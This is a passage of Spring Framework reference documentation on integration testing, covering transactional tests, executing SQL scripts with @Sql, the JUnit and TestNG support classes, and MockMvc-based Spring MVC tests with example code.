semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of the Hibernate or JPA session,\nmake sure to __flush__ the underlying session within test methods that execute that code.\nFailing to flush the underlying session can produce __false positives__: your test may\npass, but the same code throws an exception in a live, production environment. In the\nfollowing Hibernate-based example test case, one method demonstrates a false positive,\nand the other method correctly exposes the results of flushing the session. 
Note that\nthis applies to any ORM frameworks that maintain an in-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate SessionFactory sessionFactory;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tprivate EntityManager entityManager;\n\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaTransaction();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<jdbc-embedded-database-support>> and <<jdbc-embedded-database-dao-testing>> for\ndetails.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. 
`ResourceDatabasePopulator` provides options for configuring the
character encoding, statement separator, comment delimiters, and error handling flags
used when parsing and executing the scripts, and each of the configuration options has
a reasonable default value. Consult the javadocs for details on default values. To
execute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either
the `populate(Connection)` method to execute the populator against a
`java.sql.Connection` or the `execute(DataSource)` method to execute the populator
against a `javax.sql.DataSource`. The following example specifies SQL scripts for a test
schema and test data, sets the statement separator to `"@@"`, and then executes the
scripts against a `DataSource`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	public void databaseTest() {
		ResourceDatabasePopulator populator = new ResourceDatabasePopulator();
		populator.addScripts(
			new ClassPathResource("test-schema.sql"),
			new ClassPathResource("test-data.sql"));
		populator.setSeparator("@@");
		populator.execute(this.dataSource);
		// execute code that uses the test schema and data
	}
----

Note that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing
and executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in
<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and
<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>
internally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs
for the various `executeSqlScript(..)` methods for further details.


[[testcontext-executing-sql-declaratively]]
===== Executing SQL scripts declaratively with `@Sql`

In addition to the aforementioned mechanisms for executing SQL scripts
_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring
TestContext Framework. Specifically, the `@Sql` annotation can be declared on a test
class or test method to configure the resource paths to SQL scripts that should be
executed against a given database either before or after an integration test method. Note
that method-level declarations override class-level declarations and that support for
`@Sql` is provided by the `SqlScriptsTestExecutionListener`, which is enabled by default.

*Path resource semantics*

Each path will be interpreted as a Spring `Resource`. A plain path -- for example,
`"schema.sql"` -- will be treated as a classpath resource that is _relative_ to the
package in which the test class is defined. A path starting with a slash will be treated
as an _absolute_ classpath resource, for example: `"/org/example/schema.sql"`. A path
which references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)
will be loaded using the specified resource protocol.
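To illustrate, the following sketch shows the three path styles; the class name and
script locations are hypothetical, and the two commented-out declarations are
alternatives to the first:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration
	@Sql("schema.sql")            // classpath resource relative to this test class's package
	// @Sql("/org/example/schema.sql")            // absolute classpath resource
	// @Sql("file:src/test/resources/schema.sql") // resource loaded via the file: protocol
	public class PathStylesTests {
		// ...
	}
----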
The following example demonstrates how to use `@Sql` at the class level and at the method
level within a JUnit-based integration test class.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration
	@Sql("/test-schema.sql")
	public class DatabaseTests {

		@Test
		public void emptySchemaTest() {
			// execute code that uses the test schema without any test data
		}

		@Test
		@Sql({"/test-schema.sql", "/test-user-data.sql"})
		public void userTest() {
			// execute code that uses the test schema and test data
		}
	}
----

*Default script detection*

If no SQL scripts are specified, an attempt will be made to detect a `default` script
depending on where `@Sql` is declared. If a default cannot be detected, an
`IllegalStateException` will be thrown.

* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the
	corresponding default script is `"classpath:com/example/MyTest.sql"`.
* __method-level declaration__: if the annotated test method is named `testMethod()` and is
	defined in the class `com.example.MyTest`, the corresponding default script is
	`"classpath:com/example/MyTest.testMethod.sql"`.

*Declaring multiple `@Sql` sets*

If multiple sets of SQL scripts need to be configured for a given test class or test
method but with different syntax configuration, different error handling rules, or
different execution phases per set, it is possible to declare multiple instances of
`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the
`@SqlGroup` annotation can be used as an explicit container for declaring multiple
instances of `@Sql`.

The following example demonstrates the use of `@Sql` as a repeatable annotation using
Java 8. In this scenario the `test-schema.sql` script uses a different syntax for
single-line comments.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`"))
	@Sql("/test-user-data.sql")
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

The following example is identical to the above except that the `@Sql` declarations are
grouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@SqlGroup({
		@Sql(scripts = "/test-schema.sql", config = @SqlConfig(commentPrefix = "`")),
		@Sql("/test-user-data.sql")
	})
	public void userTest() {
		// execute code that uses the test schema and test data
	}
----

*Script execution phases*

By default, SQL scripts will be executed _before_ the corresponding test method. However,
if a particular set of scripts needs to be executed _after_ the test method -- for
example, to clean up database state -- the `executionPhase` attribute in `@Sql` can be
used as seen in the following example.
Note that `ISOLATED` and `AFTER_TEST_METHOD` are
statically imported from `SqlConfig.TransactionMode` and `Sql.ExecutionPhase`,
respectively.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "create-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED)
	)
	@Sql(
		scripts = "delete-test-data.sql",
		config = @SqlConfig(transactionMode = ISOLATED),
		executionPhase = AFTER_TEST_METHOD
	)
	public void userTest() {
		// execute code that needs the test data to be committed
		// to the database outside of the test's transaction
	}
----

*Script configuration with `@SqlConfig`*

Script parsing and error handling can be configured via the `@SqlConfig` annotation.
When declared as a class-level annotation on an integration test
class, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test
class hierarchy. When declared directly via the `config` attribute of the `@Sql`
annotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared
within the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit
default value which is documented in the javadocs of the corresponding attribute. Due to
the rules defined for annotation attributes in the Java Language Specification, it is
unfortunately not possible to assign a value of `null` to an annotation attribute. Thus,
in order to support overrides of inherited global configuration, `@SqlConfig` attributes
have an explicit default value of either `""` for Strings or `DEFAULT` for Enums. This
approach allows local declarations of `@SqlConfig` to selectively override individual
attributes from global declarations of `@SqlConfig` by providing a value other than `""`
or `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`
attributes do not supply an explicit value other than `""` or `DEFAULT`. Explicit _local_
configuration therefore overrides _global_ configuration.

The configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those
supported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those
provided by the `<jdbc:initialize-database/>` XML namespace element. Consult the javadocs
of individual attributes in `@Sql` and `@SqlConfig` for details.

[[testcontext-executing-sql-declaratively-tx]]
*Transaction management for `@Sql`*

By default, the `SqlScriptsTestExecutionListener` will infer the desired transaction
semantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed
without a transaction, within an existing Spring-managed transaction -- for example, a
transaction managed by the `TransactionalTestExecutionListener` for a test annotated with
`@Transactional` -- or within an isolated transaction, depending on the configured value
of the `transactionMode` attribute in `@SqlConfig` and the presence of a
`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum,
however, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.

If the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and
`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,
you may specify explicit names via the `dataSource` and `transactionManager` attributes
of `@SqlConfig`.
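For example, the following sketch bypasses the inference algorithm entirely; the bean
names `dataSource2` and `txMgr2` are hypothetical:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Test
	@Sql(
		scripts = "/test-user-data.sql",
		config = @SqlConfig(dataSource = "dataSource2", transactionManager = "txMgr2")
	)
	public void userTest() {
		// execute code that uses the test data loaded via the named DataSource
	}
----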
Furthermore, the transaction propagation behavior can be controlled via
the `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be
executed in an isolated transaction. Although a thorough discussion of all supported
options for transaction management with `@Sql` is beyond the scope of this reference
manual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide
detailed information, and the following example demonstrates a typical testing scenario
using JUnit and transactional tests with `@Sql`. Note that there is no need to clean up
the database after the `usersTest()` method is executed since any changes made to the
database (either within the test method or within the `/test-data.sql` script) will
be automatically rolled back by the `TransactionalTestExecutionListener` (see
<<testcontext-tx,transaction management>> for details).

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@ContextConfiguration(classes = TestDatabaseConfig.class)
	@Transactional
	public class TransactionalSqlScriptsTests {

		protected JdbcTemplate jdbcTemplate;

		@Autowired
		public void setDataSource(DataSource dataSource) {
			this.jdbcTemplate = new JdbcTemplate(dataSource);
		}

		@Test
		@Sql("/test-data.sql")
		public void usersTest() {
			// verify state in test database:
			assertNumUsers(2);
			// execute code that uses the test data...
		}

		protected int countRowsInTable(String tableName) {
			return JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);
		}

		protected void assertNumUsers(int expected) {
			assertEquals("Number of rows in the [user] table.", expected, countRowsInTable("user"));
		}
	}
----


[[testcontext-support-classes]]
==== TestContext Framework support classes


[[testcontext-junit4-runner]]
===== Spring JUnit Runner

The __Spring TestContext Framework__ offers full integration with JUnit 4 through a
custom runner (supported on JUnit 4.12 or higher). By annotating test classes with
`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`
variant, developers can implement standard JUnit-based unit and integration tests and
simultaneously reap the benefits of the TestContext framework such as support for loading
application contexts, dependency injection of test instances, transactional test method
execution, and so on. If you would like to use the Spring TestContext Framework with an
alternative runner such as JUnit's `Parameterized` or third-party runners such as the
`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support
for JUnit rules>> instead.

The following code listing displays the minimal requirements for configuring a test class
to run with the custom Spring `Runner`.
`@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule SPRING_CLASS_RULE = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit-based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. 
As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following support\nclasses for TestNG based test cases.\n\n* `AbstractTestNGSpringContextTests`\n* `AbstractTransactionalTestNGSpringContextTests`\n\n`AbstractTestNGSpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na TestNG environment. When you extend `AbstractTestNGSpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalTestNGSpringContextTests` is an abstract __transactional__ extension\nof `AbstractTestNGSpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalTestNGSpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalTestNGSpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalTestNGSpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@ContextConfiguration`, `@TestExecutionListeners`, and so on, and by manually\ninstrumenting your test class with a `TestContextManager`. See the source code of\n`AbstractTestNGSpringContextTests` for an example of how to instrument your test class.\n====\n\n\n\n[[spring-mvc-test-framework]]\n=== Spring MVC Test Framework\n\nThe __Spring MVC Test framework__ provides first class support for testing Spring MVC\ncode using a fluent API that can be used with JUnit, TestNG, or any other testing\nframework. 
It's built on the\n{api-spring-framework}\/mock\/web\/package-summary.html[Servlet API mock objects]\nfrom the `spring-test` module and hence does _not_ use a running Servlet container. It\nuses the `DispatcherServlet` to provide full Spring MVC runtime behavior and provides support\nfor loading actual Spring configuration with the __TestContext framework__ in addition to a\nstandalone mode in which controllers may be instantiated manually and tested one at a time.\n\n__Spring MVC Test__ also provides client-side support for testing code that uses\nthe `RestTemplate`. Client-side tests mock the server responses and also do _not_\nuse a running server.\n\n[TIP]\n====\nSpring Boot provides an option to write full, end-to-end integration tests that include\na running server. If this is your goal please have a look at the\n{doc-spring-boot}\/html\/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference page].\nFor more information on the differences between out-of-container and end-to-end\nintegration tests, see <<spring-mvc-test-vs-end-to-end-integration-tests>>.\n====\n\n\n\n[[spring-mvc-test-server]]\n==== Server-Side Tests\nIt's easy to write a plain unit test for a Spring MVC controller using JUnit or TestNG:\nsimply instantiate the controller, inject it with mocked or stubbed dependencies, and call\nits methods passing `MockHttpServletRequest`, `MockHttpServletResponse`, etc., as necessary.\nHowever, when writing such a unit test, much remains untested: for example, request\nmappings, data binding, type conversion, validation, and much more. Furthermore, other\ncontroller methods such as `@InitBinder`, `@ModelAttribute`, and `@ExceptionHandler` may\nalso be invoked as part of the request processing lifecycle.\n\nThe goal of __Spring MVC Test__ is to provide an effective way for testing controllers\nby performing requests and generating responses through the actual `DispatcherServlet`.\n\n__Spring MVC Test__ builds on the familiar <<mock-objects-servlet,\"mock\" implementations\nof the Servlet API>> available in the `spring-test` module. This allows performing\nrequests and generating responses without the need for running in a Servlet container.\nFor the most part everything should work as it does at runtime with a few notable\nexceptions as explained in <<spring-mvc-test-vs-end-to-end-integration-tests>>. 
Here is a\nJUnit-based example of using Spring MVC Test:\n\n[source,java,indent=0]\n----\n\timport static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;\n\timport static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;\n\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"test-servlet-context.xml\")\n\tpublic class ExampleTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tthis.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\t\t}\n\n\t\t@Test\n\t\tpublic void getAccount() throws Exception {\n\t\t\tthis.mockMvc.perform(get(\"\/accounts\/1\").accept(MediaType.parseMediaType(\"application\/json;charset=UTF-8\")))\n\t\t\t\t.andExpect(status().isOk())\n\t\t\t\t.andExpect(content().contentType(\"application\/json\"))\n\t\t\t\t.andExpect(jsonPath(\"$.name\").value(\"Lee\"));\n\t\t}\n\n\t}\n----\n\nThe above test relies on the `WebApplicationContext` support of the __TestContext framework__\nfor loading Spring configuration from an XML configuration file located in the same package\nas the test class, but Java-based and Groovy-based configuration are also supported. See these\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/servlet\/samples\/context[sample tests].\n\nThe `MockMvc` instance is used to perform a `GET` request to `\"\/accounts\/1\"` and verify\nthat the resulting response has status 200, the content type is `\"application\/json\"`, and the\nresponse body has a JSON property called \"name\" with the value \"Lee\". The `jsonPath`\nsyntax is supported through the Jayway https:\/\/github.com\/jayway\/JsonPath[JsonPath\nproject]. There are lots of other options for verifying the result of the performed\nrequest that will be discussed below.\n\n[[spring-mvc-test-server-static-imports]]\n===== Static Imports\nThe fluent API in the example above requires a few static imports such as\n`MockMvcRequestBuilders.{asterisk}`, `MockMvcResultMatchers.{asterisk}`, \nand `MockMvcBuilders.{asterisk}`. An easy way to find these classes is to search for\ntypes matching __\"MockMvc*\"__. If using Eclipse, be sure to add them as \n\"favorite static members\" in the Eclipse preferences under \n__Java -> Editor -> Content Assist -> Favorites__. That will allow use of content\nassist after typing the first character of the static method name. Other IDEs (e.g.\nIntelliJ) may not require any additional configuration. 
Just check the support for code
completion on static members.

[[spring-mvc-test-server-setup-options]]
===== Setup Options
There are two main options for creating an instance of `MockMvc`.
The first is to load Spring MVC configuration through the __TestContext
framework__, which loads the Spring configuration and injects a `WebApplicationContext`
into the test to use to build a `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("my-servlet-context.xml")
	public class MyWebTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Before
		public void setup() {
			this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
		}

		// ...

	}
----

The second is to simply create a controller instance manually without loading Spring
configuration. Instead, basic default configuration, roughly comparable to that of
the MVC JavaConfig or the MVC namespace, is automatically created and can be customized
to a degree:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyWebTests {

		private MockMvc mockMvc;

		@Before
		public void setup() {
			this.mockMvc = MockMvcBuilders.standaloneSetup(new AccountController()).build();
		}

		// ...

	}
----

Which setup option should you use?

The __"webAppContextSetup"__ loads your actual Spring MVC configuration, resulting in a
more complete integration test. Since the __TestContext framework__ caches the loaded
Spring configuration, it helps keep tests running fast, even as you introduce more tests
in your test suite. Furthermore, you can inject mock services into controllers through
Spring configuration in order to remain focused on testing the web layer. Here is an
example of declaring a mock service with Mockito:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="accountService" class="org.mockito.Mockito" factory-method="mock">
		<constructor-arg value="org.example.AccountService"/>
	</bean>
----

You can then inject the mock service into the test in order to set up and verify
expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	@WebAppConfiguration
	@ContextConfiguration("test-servlet-context.xml")
	public class AccountTests {

		@Autowired
		private WebApplicationContext wac;

		private MockMvc mockMvc;

		@Autowired
		private AccountService accountService;

		// ...

	}
----

The __"standaloneSetup"__ on the other hand is a little closer to a unit test. It tests
one controller at a time: the controller can be injected with mock dependencies manually,
and it doesn't involve loading Spring configuration. Such tests are more focused in style
and make it easier to see which controller is being tested, whether any specific Spring
MVC configuration is required for it to work, and so on. The "standaloneSetup" is also a
very convenient way to write ad-hoc tests to verify specific behavior or to debug an
issue.

Just like with any "integration vs. unit testing" debate, there is no right or wrong
answer.
However, using the "standaloneSetup" does imply the need for additional
"webAppContextSetup" tests in order to verify your Spring MVC configuration.
Alternatively, you may choose to write all tests with "webAppContextSetup" in order to
always test against your actual Spring MVC configuration.

[[spring-mvc-test-server-performing-requests]]
===== Performing Requests
It's easy to perform requests using any HTTP method:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/hotels/{id}", 42).accept(MediaType.APPLICATION_JSON));
----

You can also perform file upload requests that internally use
`MockMultipartHttpServletRequest` so that there is no actual parsing of a multipart
request but rather you have to set it up:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(fileUpload("/doc").file("a1", "ABC".getBytes("UTF-8")));
----

You can specify query parameters in URI template style:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels?foo={foo}", "bar"));
----

Or you can add Servlet request parameters representing either query or form parameters:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/hotels").param("foo", "bar"));
----

If application code relies on Servlet request parameters and doesn't check the query
string explicitly (as is most often the case) then it doesn't matter which option you use.
Keep in mind, however, that query params provided with the URI template will be decoded while
request parameters provided through the `param(...)` method are expected to already be decoded.

In most cases it's preferable to leave out the context path and the Servlet path from
the request URI. If you must test with the full request URI, be sure to set the
`contextPath` and `servletPath` accordingly so that request mappings will work:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/app/main/hotels/{id}").contextPath("/app").servletPath("/main"))
----

Looking at the above example, it would be cumbersome to set the contextPath and
servletPath with every performed request. Instead you can set up default request
properties:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyWebTests {

		private MockMvc mockMvc;

		@Before
		public void setup() {
			mockMvc = standaloneSetup(new AccountController())
				.defaultRequest(get("/")
					.contextPath("/app").servletPath("/main")
					.accept(MediaType.APPLICATION_JSON))
				.build();
		}
	}
----

The above properties will affect every request performed through the `MockMvc` instance.
If the same property is also specified on a given request, it overrides the default value.
That is why the HTTP method and URI in the default request don't matter since they must be
specified on every request.

[[spring-mvc-test-server-defining-expectations]]
===== Defining Expectations
Expectations can be defined by appending one or more `.andExpect(..)` calls after
performing a request:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/accounts/1")).andExpect(status().isOk());
----

`MockMvcResultMatchers.*` provides a number of expectations, some of which are further
nested with more detailed expectations.

Expectations fall in two general categories.
The first category of assertions verifies\nproperties of the response: for example, the response status, headers, and content. These\nare the most important results to assert.\n\nThe second category of assertions goes beyond the response. These assertions allow\none to inspect Spring MVC specific aspects such as which controller method processed\nthe request, whether an exception was raised and handled, what the content of the model\nis, what view was selected, what flash attributes were added, and so on. They also allow\none to inspect Servlet specific aspects such as request and session attributes.\n\nThe following test asserts that binding or validation failed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nMany times when writing tests, it's useful to _dump_ the results of the performed request.\nThis can be done as follows, where `print()` is a static import from\n`MockMvcResultHandlers`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(post(\"\/persons\"))\n\t\t.andDo(print())\n\t\t.andExpect(status().isOk())\n\t\t.andExpect(model().attributeHasErrors(\"person\"));\n----\n\nAs long as request processing does not cause an unhandled exception, the `print()` method\nwill print all the available result data to `System.out`. Spring Framework 4.2 introduces\na `log()` method and two additional variants of the `print()` method, one that accepts\nan `OutputStream` and one that accepts a `Writer`. For example, invoking\n`print(System.err)` will print the result data to `System.err`; while invoking\n`print(myWriter)` will print the result data to a custom writer. If you would like to\nhave the result data _logged_ instead of printed, simply invoke the `log()` method which\nwill log the result data as a single `DEBUG` message under the\n`org.springframework.test.web.servlet.result` logging category.\n\nIn some cases, you may want to get direct access to the 